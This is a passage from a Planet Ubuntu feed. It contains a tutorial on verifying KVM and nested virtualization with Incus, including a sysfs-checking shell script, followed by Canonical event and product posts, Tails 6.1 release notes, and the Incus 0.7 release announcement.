<p>The Linux kernel that is available in most Linux distributions supports <a href="https://en.wikipedia.org/wiki/Kernel-based_Virtual_Machine">the KVM hypervisor</a> for virtualization.</p>
<p>Applications use <a href="https://libvirt.org/">the <code>libvirt</code> toolkit</a> to access the virtualization features. </p>
<p>In order to test if our host supports virtualization, we install the <code>cpu-checker</code> and <code>libvirt-clients</code> packages on the host and then run <code>kvm-ok</code> and <code>virt-host-validate</code> respectively to verify our system. Of the two utilities, the latter is better. However, I am including <code>cpu-checker</code> as it is covered in lots of documentation.</p>
<pre class="wp-block-code"><code>$ <kbd>sudo apt install -y cpu-checker libvirt-clients</kbd>
...
$ <kbd>kvm-ok</kbd>
INFO: /dev/kvm exists
KVM acceleration can be used
$ <kbd>sudo virt-host-validate</kbd>
QEMU: Checking for hardware virtualization : PASS
QEMU: Checking if device /dev/kvm exists : PASS
QEMU: Checking if device /dev/kvm is accessible : PASS
QEMU: Checking if device /dev/vhost-net exists : PASS
QEMU: Checking if device /dev/net/tun exists : PASS
QEMU: Checking for cgroup 'cpu' controller support : PASS
QEMU: Checking for cgroup 'cpuacct' controller support : PASS
QEMU: Checking for cgroup 'cpuset' controller support : PASS
QEMU: Checking for cgroup 'memory' controller support : PASS
QEMU: Checking for cgroup 'devices' controller support : PASS
QEMU: Checking for cgroup 'blkio' controller support : PASS
QEMU: Checking for device assignment IOMMU support : PASS
QEMU: Checking if IOMMU is enabled by kernel : PASS
QEMU: Checking for secure guest support : WARN (Unknown if this platform has Secure Guest support)
LXC: Checking for Linux >= 2.6.26 : PASS
LXC: Checking for namespace ipc : PASS
LXC: Checking for namespace mnt : PASS
LXC: Checking for namespace pid : PASS
LXC: Checking for namespace uts : PASS
LXC: Checking for namespace net : PASS
LXC: Checking for namespace user : PASS
LXC: Checking for cgroup 'cpu' controller support : PASS
LXC: Checking for cgroup 'cpuacct' controller support : PASS
LXC: Checking for cgroup 'cpuset' controller support : PASS
LXC: Checking for cgroup 'memory' controller support : PASS
LXC: Checking for cgroup 'devices' controller support : PASS
LXC: Checking for cgroup 'freezer' controller support : FAIL (Enable 'freezer' in kernel Kconfig file or mount/enable cgroup controller in your system)
LXC: Checking for cgroup 'blkio' controller support : PASS
LXC: Checking if device /sys/fs/fuse/connections exists : PASS
$ </code></pre>
<p>If you get a failure, try to identify whether the issue is with your computer’s firmware or with the Linux kernel of your host. If in doubt, post the output below.</p>
<p>Why does the output mention both <strong>QEMU</strong> and <strong>LXC</strong>? By default, the command shows all <code>libvirt</code> virtualization support, unless you specify something specific. If you wanted only the QEMU output, you would run <code>sudo virt-host-validate qemu</code>. Note that the LXC here is not <a href="https://linuxcontainers.org/lxc/introduction/">the Linux Containers LXC</a>. The LXC above is <a href="https://libvirt.org/drvlxc.html">the Libvirt LXC</a>.</p>
<h2 class="wp-block-heading" id="testing-your-host-for-nested-virtualization">Testing your host for nested virtualization</h2>
<p>I have not noticed any mention of <em>nested virtualization</em> in the output of <code>virt-host-validate</code>. If you know a tool that shows that information, write it in the comments. In the absence of such a tool, let’s check manually.</p>
<p>If you have an AMD CPU, run the following. If you get <code>1</code>, then nested virtualization through KVM works.</p>
<pre class="wp-block-code"><code>$ <kbd>cat /sys/module/kvm_amd/parameters/nested </kbd>
1
$ </code></pre>
<p>If instead you have an Intel CPU, run the following. If you get <code>Y</code> (instead of <strong><em>1</em></strong>), then nested virtualization through KVM works.</p>
<pre class="wp-block-code"><code>$ <kbd>cat /sys/module/kvm_intel/parameters/nested</kbd>
Y
$ </code></pre>
<p>If instead you get an error (such as the following), then something is wrong. Report back your CPU model and motherboard, along with the Linux kernel version and Linux distribution.</p>
<pre class="wp-block-code"><code>cat: /sys/module/kvm_intel/parameters/nested: No such file or directory</code></pre>
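<p>The manual checks above can be combined into one script that reads the same sysfs files and gives a single verdict. This is an added example, not code from the original post: the function names, the two optional path arguments and the return codes are assumptions made for the example.</p>

```shell
#!/bin/sh
# Added example, not from the original post. It reads the same sysfs files the
# post inspects by hand and turns them into one verdict.
#
# nested_status [SYSFS_ROOT] [CPUINFO]
#   SYSFS_ROOT (default /sys) and CPUINFO (default /proc/cpuinfo) are
#   hypothetical overrides so the check can also run against a test tree.
# Return codes: 0 enabled, 1 disabled, 2 KVM vendor module not loaded,
#               3 unrecognised value in the parameter file.

# cpu_has_flag CPUINFO FLAG: true if FLAG appears on a "flags" line.
# Anchoring on "^flags" skips the separate "vmx flags" line of newer kernels.
cpu_has_flag() {
    grep -Eq "^flags[[:space:]]*:.*[[:space:]]$2([[:space:]]|\$)" "$1" 2>/dev/null
}

nested_status() {
    ns_sysfs="${1:-/sys}"
    ns_cpuinfo="${2:-/proc/cpuinfo}"
    ns_mod=""

    # Whichever vendor module is loaded exposes the "nested" parameter.
    for ns_try in kvm_intel kvm_amd; do
        if [ -r "$ns_sysfs/module/$ns_try/parameters/nested" ]; then
            ns_mod="$ns_try"
            break
        fi
    done

    if [ -z "$ns_mod" ]; then
        # Same situation as the "No such file or directory" error in the post.
        # The CPU flags say which module should have been loaded:
        # vmx is Intel VT-x, svm is AMD-V.
        if cpu_has_flag "$ns_cpuinfo" vmx; then
            echo "kvm_intel: not loaded although the CPU reports vmx; check BIOS/UEFI and the host kernel"
        elif cpu_has_flag "$ns_cpuinfo" svm; then
            echo "kvm_amd: not loaded although the CPU reports svm; check BIOS/UEFI and the host kernel"
        else
            echo "kvm: no vendor module loaded and no vmx/svm CPU flag found"
        fi
        return 2
    fi

    ns_value=$(tr -d '[:space:]' < "$ns_sysfs/module/$ns_mod/parameters/nested")
    case "$ns_value" in
        1|Y|y)
            echo "$ns_mod: nested virtualization enabled (nested=$ns_value)"
            return 0 ;;
        0|N|n)
            # "nested" is a module parameter, so it is set when the module loads.
            echo "$ns_mod: nested virtualization disabled (nested=$ns_value); set 'options $ns_mod nested=1' under /etc/modprobe.d/ and reload the module"
            return 1 ;;
        *)
            echo "$ns_mod: unrecognised value '$ns_value'"
            return 3 ;;
    esac
}

# Report on the current host when the file is run as a script.
nested_status && ns_rc=0 || ns_rc=$?
echo "exit status: $ns_rc"
```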
<h2 class="wp-block-heading" id="launching-the-outer-incus-vm">Launching the outer Incus VM</h2>
<p>We launch the outer VM. Get a shell into the outer VM, install Incus and those utilities that show whether KVM virtualization works. Then, we launch an Alpine VM in the outer VM. We get an error regarding Secure Boot (the Alpine Linux kernel is not signed), remove the stuck VM and launch again with Secure Boot disabled. Finally, we get a shell into the inner VM.</p>
<pre class="wp-block-code"><code>$ <kbd>incus launch images:debian/12 outervm --vm</kbd>
Launching outervm
$ <kbd>incus shell outervm</kbd>
root@outervm:~#
# Install Incus according to the documentation.
root@outervm:~# <kbd>sudo apt install -y cpu-checker libvirt-clients</kbd>
...
root@outervm:~# <kbd>virt-host-validate </kbd>
QEMU: Checking for hardware virtualization : PASS
QEMU: Checking if device /dev/kvm exists : PASS
QEMU: Checking if device /dev/kvm is accessible : PASS
QEMU: Checking if device /dev/vhost-net exists : PASS
QEMU: Checking if device /dev/net/tun exists : PASS
...
root@outervm:~# <kbd>incus launch images:alpine/edge innervm --vm</kbd>
Launching innervm
Error: Failed instance creation: The image used by this instance is incompatible with secureboot. Please set security.secureboot=false on the instance
root@outervm:~# <kbd>incus delete innervm</kbd>
root@outervm:~# <kbd>incus launch images:alpine/edge innervm --vm --config security.secureboot=false</kbd>
Launching innervm
root@outervm:~# <kbd>incus list -c ns4t</kbd>
+---------+---------+-----------------------+-----------------+
| NAME | STATE | IPV4 | TYPE |
+---------+---------+-----------------------+-----------------+
| innervm | RUNNING | 10.227.169.165 (eth0) | VIRTUAL-MACHINE |
+---------+---------+-----------------------+-----------------+
root@outervm:~# <kbd>uname -a</kbd>
Linux outervm 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64 GNU/Linux
root@outervm:~# <kbd>incus shell innervm</kbd>
innervm:~# <kbd>uname -a</kbd>
Linux innervm 6.6.22-1-virt #2-Alpine SMP PREEMPT_DYNAMIC Thu, 14 Mar 2024 02:12:52 +0000 x86_64 Linux
innervm:~# </code></pre>
<figure class="wp-block-image size-large"><a href="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/Screenshot-from-2024-03-27-15-39-25.png?ssl=1"><img alt="" class="wp-image-46740" height="449" src="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/Screenshot-from-2024-03-27-15-39-25.png?resize=750%2C449&ssl=1" width="750" /></a></figure>
<h2 class="wp-block-heading" id="conclusion">Conclusion</h2>
<p>We saw how to verify whether our host is able to work with hardware virtualization. This involves checking both the computer firmware settings (BIOS/UEFI) and the host Linux kernel.</p>
<p>Then, we created an outer VM with Incus, got a shell into there, installed Incus, and launched an inner (<strong><em>nested</em></strong>) VM. </p>
<p>I wonder whether we can go further and create a VM inside the inner VM. If you go through these and try to create an inner inner VM, post the error message. It does not feel like it should be possible.</p>
Ubuntu developershttp://planet.ubuntu.com/Ubuntu Blog: Canonical at Google Next – What you need to knowhttps://ubuntu.com//blog/canonical-at-google-next-what-you-need-to-know2024-03-27T11:00:00+00:00<p>Google Next is making its way to Las Vegas, and Ubuntu is joining the journey. As a proud sponsor, Canonical, the publisher of Ubuntu , invites you to join us at the event and visit booth #252 in the Mandalay Bay Expo Hall. As one of the most popular Linux operating systems, Canonical is dedicated to providing commercial support and driving open source innovation across a diverse range of industries and applications. Stop by and learn more about how Canonical and GCP are collaborating to empower businesses with secure and scalable solutions for their cloud computing needs. </p>
<h2 class="wp-block-heading">Ubuntu ‘Show you’re a Pro’ Challenge: Find and patch the vulnerabilities and earn awesome swag!</h2>
<p>Are you an Ubuntu Pro? Test your skills at our booth! Sit down at our workstation and discover any unpatched vulnerabilities on the machine. Showcase your expertise by securing the system completely, and receive exclusive swag as a token of our gratitude.</p>
<h2 class="wp-block-heading">Security maintenance for your full software stack</h2>
<p>At Canonical, security is paramount. Ubuntu Pro offers a solution to offload security and compliance concerns for your open source stack, allowing you to concentrate on building and managing your business. Serving as an additional layer of services atop every Ubuntu LTS release, Ubuntu Pro ensures robust protection for your entire software stack, encompassing over 30,000 open source packages. Say farewell to fragmented security measures; Canonical provides a holistic approach, delivering security and support through a unified vendor. Additionally, relish the assurance of vendor-backed SLA support for open source software, providing peace of mind for your operations.</p>
<h2 class="wp-block-heading">Confidential computing across clouds</h2>
<p>Confidential computing is a revolutionary technology that disrupts the conventional threat model of public clouds. In the past, vulnerabilities within the extensive codebase of the cloud’s privileged system software, including the operating system and hypervisor, posed a constant risk to the confidentiality and integrity of code and data in operation. Likewise, unauthorized access by a cloud administrator could compromise the security of your virtual machine (VM). </p>
<p>Ubuntu Confidential VMs (CVMs) on Google Cloud offer enhanced security for your workloads by utilizing hardware-protected Trusted Execution Environments (TEEs). With the broadest range of CVMs available, Ubuntu enables users on Google Cloud to benefit from the cutting-edge security features of AMD 4th Gen EPYC processors with SEV-SNP and Intel Trust Domain Extensions (Intel TDX).</p>
<h2 class="wp-block-heading">Scale your AI projects with open source tooling</h2>
<p>Empower your organization with Canonical’s AI solutions. We specialize in the automation of machine learning workloads on any environment, whether private or public cloud, or hybrid or multi cloud. We provide an end-to-end MLOps solution to develop and deploy models in a secure, reproducible, and portable manner that seamlessly integrates with your existing technology stack. Let us help you unlock the full potential of AI.</p>
<h2 class="wp-block-heading">Join Us at Google Next 2024</h2>
<p>Mark your calendars and make plans to visit Canonical at Google Cloud Next 2024. Whether you’re seeking cutting-edge solutions for cloud computing, robust security measures for your software stack, or innovative AI tools to propel your organization forward, our team will be on hand to offer insights, demonstrations, and personalized consultations to help you harness the power of open source technology for your business. Join us at booth #252 to discover how Canonical and Ubuntu can elevate your digital journey. See you there!</p>
<p>Prompts:</p>
<p>Canonical at Google Next – What you need to know!</p>
<p>Canonical is excited to sponsor Google Cloud Next in Las Vegas, NV April 9-11, 2024. </p>
<p>Visit the Canonical-Ubuntu booth #252 in the Mandalay Bay Expo Hall. </p>
<p>Our team will be available to discuss the following:</p>
<ul>
<li>Protect your full software tech stack with Ubuntu Pro providing security coverage for 30,000+ software packages.</li>
<li>Single vendor for security requirements – delivery, security, support; Vendor-backed SLA support for open source </li>
<li>Confidential computing – OS support across all clouds (multi-cloud/hybrid cloud)</li>
<li>AI
<ul>
<li>Canonical provides tailored solutions to enable your organisation to efficiently run machine learning workloads. Canonical offers an end-to-end MLOps solution that can be used across all layers of the technology stack.</li>
</ul>
</li>
</ul>
<p>While at our booth, earn some awesome swag by showing that you’re an Ubuntu Pro. Take a seat at our workstation to find the unpatched vulnerabilities on the machine! Upgrade the machine to be fully secure to earn awesome swag! </p>
<p>See you at the event</p>Ubuntu developershttp://planet.ubuntu.com/Tails 6.1https://tails.net/news/version_6.1/index.en.html2024-03-27T10:42:03+00:00<h1 id="changes">Changes and updates</h1>
<ul>
<li><p>Update <em>Tor Browser</em> to <a href="https://blog.torproject.org/new-release-tor-browser-13013/">13.0.13</a>.
This includes the changes brought by <a href="https://blog.torproject.org/new-release-tor-browser-13012/">13.0.12</a>.</p></li>
<li><p>Update <em>Thunderbird</em> to <a href="https://www.thunderbird.net/en-US/thunderbird/115.9.0/releasenotes/">115.9.0</a>.</p></li>
</ul>
<h1 id="fixes">Fixed problems</h1>
<ul>
<li><p>Fix Onion Circuits. <a href="https://gitlab.tails.boum.org/tails/tails/-/issues/20233">#20233</a></p></li>
<li><p>Fix Welcome Screen frequently showing a <strong>"Welcome to Tails!" is not responding</strong> error.
<a href="https://gitlab.tails.boum.org/tails/tails/-/issues/20236">#20236</a></p></li>
<li><p>Fix <em>Videos</em> showing an error message during playback. <a href="https://gitlab.tails.boum.org/tails/tails/-/issues/20243">#20243</a></p></li>
<li><p>Fix problems with changing the passphrase of the Persistent Storage.
<a href="https://gitlab.tails.boum.org/tails/tails/-/issues/20217">#20217</a></p></li>
<li><p><em>Tails Cloner</em> can now install and upgrade to devices with multiple mounted partitions.
<a href="https://gitlab.tails.boum.org/tails/tails/-/issues/20149">#20149</a></p></li>
<li><p>The Persistent Storage settings now display
all enabled custom Persistent Storage features. <a href="https://gitlab.tails.boum.org/tails/tails/-/issues/19267">#19267</a></p></li>
<li><p>Mitigate the RFDS Intel CPU vulnerabilities. <a href="https://gitlab.tails.boum.org/tails/tails/-/issues/20274">#20274</a></p></li>
</ul>
<p>For more details, read our <a href="https://gitlab.tails.boum.org/tails/tails/-/blob/master/debian/changelog">changelog</a>.</p>
<h1 id="get">Get Tails 6.1</h1>
<h2>To upgrade your Tails USB stick and keep your Persistent Storage</h2>
<ul>
<li><p>Automatic upgrades are available from Tails 6.0 to 6.1.</p>
<p>You can <a href="https://tails.net/doc/upgrade/index.en.html#reduce">reduce the size of the download</a> of future
automatic upgrades by doing a manual upgrade to the latest version.</p></li>
<li><p>If you cannot do an automatic upgrade or if Tails fails to start after an
automatic upgrade, please try to do a <a href="https://tails.net/doc/upgrade/index.en.html#manual">manual upgrade</a>.</p></li>
</ul>
<h2>To install Tails 6.1 on a new USB stick</h2>
<p>Follow our installation instructions:</p>
<ul>
<li><p><a href="https://tails.net/install/windows/index.en.html">Install from Windows</a></p></li>
<li><p><a href="https://tails.net/install/mac/index.en.html">Install from macOS</a></p></li>
<li><p><a href="https://tails.net/install/linux/index.en.html">Install from Linux</a></p></li>
<li><p><a href="https://tails.net/install/expert/index.en.html">Install from Debian or Ubuntu using the command line and GnuPG</a></p></li>
</ul>
<div class="caution"><p>The Persistent Storage on the USB stick will be lost if
you install instead of upgrading.</p></div>
<h2>To download only</h2>
<p>If you don't need installation or upgrade instructions, you can download
Tails 6.1 directly:</p>
<ul>
<li><p><a href="https://tails.net/install/download/index.en.html">For USB sticks (USB image)</a></p></li>
<li><p><a href="https://tails.net/install/download-iso/index.en.html">For DVDs and virtual machines (ISO image)</a></p></li>
</ul>Tailshttps://tails.net/news/index.en.htmlUbuntu Blog: What is a telco cloud?https://ubuntu.com//blog/what-is-a-telco-cloud2024-03-27T08:00:00+00:00<p>Telecommunications companies (telcos) are well on their way to transforming their infrastructure from the legacy, unadaptable, complex network of dedicated hardware from yesteryears to agile, modular and scalable software-defined systems running on common off-the-shelf (COTS) servers.</p>
<p>Within this space, the current trend, driven by 5G deployments, is to complement tried and tested network function virtualisation (NFV) infrastructure with cloud-native network functions (CNFs). This refers to the cloud-native approach of building, deploying and managing telco functions and applications as a mesh of micro services packaged as containers.</p>
<p>A telco cloud is a highly robust and dynamic infrastructure built using cloud-native technologies designed specifically for communication services providers (CSPs) to deliver agile, flexible and efficient telecom services. It combines various components like software-defined networking (SDN), orchestration tools and other cloud computing technologies to enable the creation, customisation, and management of network services in a more cost-effective, scalable, and automated manner compared to traditional telecom architectures. It empowers telcos to reduce their innovations’ time to market, to react more quickly to shifts in network requirements and to improve their operational efficiency. A telco cloud provides the foundation for next-generation communication services, including 5G stand-alone (5G SA) networks and various Internet of Things (IoT) applications.</p>
<h2 class="wp-block-heading">How does a telco cloud address telco challenges?</h2>
<p>In order to stay innovative and competitive, telcos need ever more agility. They need to respond quickly to shifting market dynamics, evolving customer demands and emerging technologies. They require flexibility, modularity and freedom to customise solutions to keep up with the evolution of the industry. These are all areas in which a telco cloud can help.</p>
<h3 class="wp-block-heading">Innovate and customise</h3>
<p>With cloud-native application development techniques, telcos can leverage a telco cloud to bring new 5G revenue streams, internally developed or externally acquired from new tech and start-ups with a higher risk appetite than service providers.</p>
<p>They can reduce the time to develop, build and deploy new services and features to specific customer segments. This enables bringing solutions targeting new markets, such as industry monitoring, smart cities, smart homes, connected cars and fleet management.</p>
<p>These solutions can be tailored to specific customers quickly and economically thanks to the agility, modularity and flexibility of cloud-native software development.</p>
<p>Similarly, these technologies allow telcos to build platforms which can ignite collaboration and provide support to innovative third party developers. This can enable the creation of value in the telco’s core competencies, including connectivity and operational excellence, while reducing risks associated with the process of experimentation.</p>
<h3 class="wp-block-heading">Increase power efficiency</h3>
<p>Energy expenses currently comprise <a href="https://www.gsmaintelligence.com/product-news/going-green-energy-efficiency-in-telecoms/">between 15% and 40% of telcos’ operating costs</a>. They are all actively looking for ways to reduce their energy consumption through energy-efficient technology, renewable energy sources, and improved operational efficiency.</p>
<p>By virtualizing network functions and consolidating multiple workloads on a shared infrastructure, a telco cloud reduces the overall number of physical servers and corresponding power requirements. With intelligent load-balancing techniques, a telco cloud ensures optimal resource utilisation across the network, minimising idle resources and reducing the need for excess capacity, which in turn decreases power consumption. </p>
<p>The use of specific analytics coupled with automation can be beneficial to optimise the power consumption of telco workloads. Underutilised wasteful infrastructure can be identified and massive power savings can be achieved with the right optimisation approach while maintaining network performance and service levels. A telco cloud offers the flexibility to scale resources up or down according to demand, ensuring that only the necessary compute, storage and network capacity is being used. The high availability and fault tolerance features of a telco cloud ensure minimal downtime and prevent overloading of resources, thereby optimising energy consumption by reducing the need for redundant equipment or backup systems.</p>
<h3 class="wp-block-heading">Improve customer loyalty</h3>
<p>Telcos are facing heightened competition and shifting consumer behaviours, necessitating creative approaches to increase revenue and maintain customer expansion. One way is to bundle and aggregate popular streaming services by partnering with content platforms.</p>
<p>A telco cloud enables the integration – from delivery to billing – of various digital services, such as over-the-top (OTT) media content distribution, to significantly enhance the telco customer experience. </p>
<p>Using AI-powered tools, telcos are also able to grow their revenues by predicting and preventing subscriber churn. A telco cloud delivers more agile cloud-centric monetisation platforms providing more insights to power the new generation of services.</p>
<h3 class="wp-block-heading">Reduce costs</h3>
<p>A telco cloud, when run at scale, reduces the capital expenditure required to support network infrastructure by enabling companies to utilise COTS hardware and pay only for the capacity they need, adjusting with usage changes, while leveraging the hybrid cloud.</p>
<p>This shift to operational expenditure is covered by the accompanying process automation enabled by Telco Cloud best practices and cloud-native application development methodologies, such as DevSecOps and CI/CD.</p>
<p>The highly resilient and automated architecture of the Telco Cloud also improves service availability and reduces the time to respond to faults and demand fluctuations.</p>
<div>
<a href="https://ubuntu.com/engage/telco-dilemma-reduce-5g-infra-cost">
<p class="p-button--positive">Read more about reducing 5G infrastructure costs with open source</p>
</a>
</div>
<h2 class="wp-block-heading">What are the technical requirements for a telco cloud?</h2>
<p>There are significant differences between your general purpose cloud environment and that of a telco cloud. With the exception of mission-critical applications, enterprise cloud deployments can tolerate less tight availability and performance requirements than those of telco network functions.</p>
<p>Some functions, such as the 5G Radio Access Network (RAN), need to perform in real-time at the edge of the network, as close to the user equipment as possible, with the best throughput and latency. The five nines availability goal, a downtime of no more than 5.26 minutes per year, is also a given.</p>
<p>A telco cloud encompasses not only the telco central offices and edge locations, but also data centres spread across the network reach. It delivers its network functions and other workloads wherever they can be run in order to optimise efficiency and quality of experience.</p>
<p>Carrier-grade network requirements initially prevented moving network functions to the public cloud. With the improvement of multi cloud and hybrid cloud connectivity, more and more telcos are leveraging public cloud infrastructure for some of their telco cloud network functions. One significant advantage of the container technology used in cloud-native architecture is its portability. The microservices realising a network function and its dependencies are encapsulated in a single, self-contained unit that can run on any system that supports the container format.</p>
<p>One of the key conditions in achieving a successful implementation of a telco cloud is the need for business continuity and coexistence of cloud-native with existing legacy infrastructure. During a telco cloud deployment, companies need to be able to seamlessly migrate existing network services and applications in a coordinated manner. A good way to approach this challenge is to consider not only the infrastructure and product portfolio but also the organisation and its processes.</p>
<p>As with any project, there are several factors to evaluate when deploying a telco cloud:</p>
<ul>
<li>Whether to buy a complete solution or to do everything or part of it internally, with or without external support from a systems integrator.</li>
<li>What amount should be invested upfront?</li>
<li>How much risk is acceptable?</li>
<li>What is the target time-to-market?</li>
<li>How will success be defined and measured?</li>
</ul>
<p>Some of the key decisions that telcos need to make include:</p>
<ul>
<li>Identifying the telco cloud services that need to be redeveloped as microservices instead of migrated virtual machines (VMs).</li>
<li>Selecting the right management and orchestration tools to support the efficient and effective automation of a telco cloud.</li>
<li>Defining the rules that drive the hybrid cloud approach, depending on the economics, operational expertise and time-to-market requirements.</li>
<li>Partnering and collaborating with technology companies, startups, and other organisations. This can help to access new technologies, markets, and expertise, and accelerate time-to-market.</li>
</ul>
<p>The path to a successful telco cloud deployment can be long and difficult but it is one of the key milestones for a telco to achieve its transition into a “techco” (technology-driven company) equipped to face competition from tech giants, media conglomerates and startups.</p>
<h2 class="wp-block-heading">How can Canonical help you deploy a telco cloud?</h2>
<p>In order to deploy a telco cloud effectively, companies need the tools that can support all their critical workloads wherever they run them, and enable them to incorporate innovators into the CSP network.</p>
<p>Canonical brings the power of open source cloud-native technologies to the telco industry. A member of key telecommunications initiatives (such as the <a href="https://canonical.com/blog/canonical-joins-open-networking-foundation">Open Networking Foundation</a>, where we contribute to the <a href="https://opennetworking.org/aether/">Aether</a> project, the <a href="https://canonical.com/blog/canonical-joins-the-openairinterfacesoftware-alliance">OpenAirInterface Software Alliance</a>, the <a href="https://canonical.com/blog/canonical-joins-the-sylva-project">Sylva</a> project, and <a href="https://www.etsi.org/">ETSI</a>), Canonical provides cloud platforms that support the deployment and operation of certified virtual and container network functions both for the 5G Core and RAN. We are a proven, trusted technology partner in the ecosystem, with years of experience in telco operations across the globe.</p>
<p>Canonical maintains a strong security posture by ensuring all published open source software is hardened, audited and certified to adhere to industry standards. This commitment extends to reducing the footprint of the OS and containers to minimise the attack surface.</p>
<p>This specific innovation also translates into efficiency gains that are significant in large-scale RAN deployments involving tens or even hundreds of thousands of nodes.</p>
<p>Furthermore, Canonical’s robust <a href="https://ubuntu.com/blog/bringing-automation-to-telco-edge-clouds-at-scale">automation tooling</a> and 12 years of long term support (LTS) not only streamline day 2 operations but also contribute to a competitive TCO, making Canonical the most economical vendor in the market.</p>
<p>Global top-tier operators endorse Canonical solutions for telcos. Our solutions encompass core, RAN and edge use cases and provide essential Enhanced Platform Awareness capabilities such as affinity and anti-affinity rules, CPU pinning, DPDK, Huge Pages, SR-IOV and secondary vNIC access, among others.</p>
<p>Groundwork starts with our tight partnerships with <a href="https://canonical.com/partners/silicon">silicon vendors and independent hardware vendors</a> that ensure Canonical provides the best silicon enablement and support for innovative technologies and acceleration capabilities.</p>
<p>Lastly, Canonical’s simple and unique <a href="https://ubuntu.com/pro">Ubuntu Pro</a> subscription offers the most comprehensive long term support, security and compliance for all your open source software. Using Canonical solutions, companies can operate carrier-grade cloud-native Telco Clouds at scale.</p>
<h3 class="wp-block-heading">Learn more about Canonical solutions for telcos</h3>
<p><a href="https://ubuntu.com/telco">Carrier-grade open source for telecommunications</a></p>
<p><a href="https://canonical.com/solutions/telco">Transform your infrastructure with secure and cloud-native telecom solutions</a></p>
<h3 class="wp-block-heading">Further reading</h3>
<p><a href="https://ubuntu.com/engage/telco-dilemma-reduce-5g-infra-cost">Reduce 5G infrastructure costs with open source</a></p>
<p><a href="https://ubuntu.com/blog/how-telcos-are-building-carrier-grade-infrastructure-using-open-source">How telcos are building carrier-grade infrastructure using open source</a></p>
<p><a href="https://ubuntu.com/blog/how-a-real-time-kernel-reduces-latency-in-telco-edge-clouds">How a real-time kernel reduces latency in telco edge clouds</a></p>Ubuntu developershttp://planet.ubuntu.com/Stéphane Graber: Announcing Incus 0.7https://stgraber.org/?p=15612024-03-26T22:42:33+00:00<p>The last Incus release before we go LTS has now been released!</p>
<p>This is quite the feature-packed release, as it is meant to include just about every feature we want in Incus 6.0 LTS except for a few last-minute minor additions.</p>
<p>You’ll find new features for just about everyone, from multi-cluster networking with the new network integrations, to enhanced performance on multi-socket servers with the improved NUMA support, to easier authentication with JSON Web Token support, to I/O limits for virtual machines and more USB passthrough options.</p>
<figure class="wp-block-image size-large"><a href="https://linuxcontainers.org/incus/try-it/" rel="noreferrer noopener" target="_blank"><img alt="" class="wp-image-1562" height="600" src="https://stgraber.org/wp-content/uploads/2024/03/image-1024x600.png" width="1024" /></a></figure>
<p>The full announcement and changelog can be <a href="https://discuss.linuxcontainers.org/t/incus-0-7-has-been-released/19485" rel="noreferrer noopener" target="_blank">found here</a>.<br />And for those who prefer videos, here’s the release overview video:</p>
<p>You can take the latest release of Incus up for a spin through our online demo service at: <a href="https://linuxcontainers.org/incus/try-it/" rel="noreferrer noopener" target="_blank">https://linuxcontainers.org/incus/try-it/</a></p>
<p>And as always, my company is offering commercial support on Incus, ranging from by-the-hour support contracts to one-off services on things like initial migration from LXD, review of your deployment to squeeze the most out of Incus or even feature sponsorship. You’ll find all details of that here: <a href="https://zabbly.com/incus">https://zabbly.com/incus</a></p>
<p>Donations towards my work on this and other open source projects are also always appreciated; you can find me on <a href="https://github.com/sponsors/stgraber">GitHub Sponsors</a>, <a href="https://patreon.com/stgraber">Patreon</a> and <a href="https://ko-fi.com/stgraber">Ko-fi</a>.</p>
<p>Enjoy!</p>Ubuntu developershttp://planet.ubuntu.com/How to Install the Rootfs into the Btrfs subvolume & Set a Restore envhttps://www.deepin.org/?p=334062024-03-26T02:14:55+00:00Author: ziggy [Btrfs Now] Installing the rootfs into the btrfs subvols for deepin & Set the restore env Pre-preparation Installation Preparation Prepare an installation image and flash it with a mobile storage device; a kernel with version 5.10+ is recommended, which has better support for btrfs. Set 2 partitions in advance. A btrfs partition as the main rootfs. A live system with full functions. An independent partition to install the initial system. It could be installed onto an external hard disk instead. When the hard disk where btrfs is located is broken, it can be restored as a rootb backup. ...<a href="https://www.deepin.org/en/install-the-rootfs-into-the-btrfs-subvolume/">Read more</a>aidahttps://www.deepin.org/enUbuntu Blog: Charmed MongoDB enters general availabilityhttps://ubuntu.com//blog/charmed-mongodb-enters-general-availability2024-03-26T01:00:00+00:00<p><strong>March 26, 2024:</strong> Today, Canonical announced the release of Charmed MongoDB, an enterprise solution for MongoDB® that comes with advanced automation features, multi-cloud capabilities and comprehensive support. </p>
<p><a href="https://ubuntu.com/blog/what-is-mongodb">MongoDB</a>® is one of the most widely used databases worldwide. It provides powerful capabilities for scaling, consistency and fault tolerance, making it a popular choice for organisations of all sizes and in various industries. Charmed MongoDB is an enterprise drop-in replacement for the MongoDB® Community version with the advanced features organisations need in their production environment.</p>
<p><em>“As part of our open source data solution portfolio, Charmed MongoDB is designed to meet the demands of modern deployments”</em>, said Cedric Gegout, VP of Product at Canonical. <em>“Organisations can deploy Charmed MongoDB with confidence, knowing they are backed by Canonical’s commitment to performance in any cloud environment, alongside 10 years of support and security maintenance.”</em></p>
<h3 class="wp-block-heading">Hyper-automated MongoDB<strong><sup>®</sup></strong>, available on any cloud</h3>
<p>The Charmed MongoDB operator deploys and runs MongoDB® on physical and virtual machines (VMs) and other cloud and cloud-like environments, including AWS, Azure, OpenStack and VMware.<br /><br />The solution comes with automation features that simplify the deployment, scaling, design, and management of MongoDB®, ensuring reliability. In addition to these capabilities, Charmed MongoDB offers enterprise-level features such as high availability, sharding, audit logging, backup and restore, user management, and Transport Layer Security (TLS). </p>
<h3 class="wp-block-heading">Secured and supported for 10 years</h3>
<p>For organisations looking for fast security patching against Common Vulnerabilities and Exposures (CVEs), Charmed MongoDB offers comprehensive security maintenance. Canonical’s Charmed MongoDB offers a cost-effective subscription model that includes 10 years of security maintenance and 24/7 support, providing the stability and peace of mind necessary for organisations to run MongoDB® in production. </p>
<h3 class="wp-block-heading">Simple pricing per node</h3>
<p>Charmed MongoDB is part of Canonical’s <a href="https://canonical.com/data">data solutions portfolio</a>. Customers purchase 24/7 or weekday enterprise support on a per-node basis through the Ubuntu Pro + Support plan, which covers all applications within the portfolio, including <a href="https://canonical.com/data/kafka">Charmed Kafka</a> and <a href="https://canonical.com/data/spark">Charmed Spark</a> as well as solutions for AI offered by Canonical such as <a href="https://ubuntu.com/ai/what-is-kubeflow">Charmed Kubeflow</a> and <a href="https://ubuntu.com/ai/mlflow">Charmed MLflow</a>.</p>
<p>This convenient subscription per node and lack of software licence fees makes Canonical’s offering compelling for organisations looking to run database solutions like MongoDB® with more control over their TCO. Budgeting and financial planning are straightforward and predictable.</p>
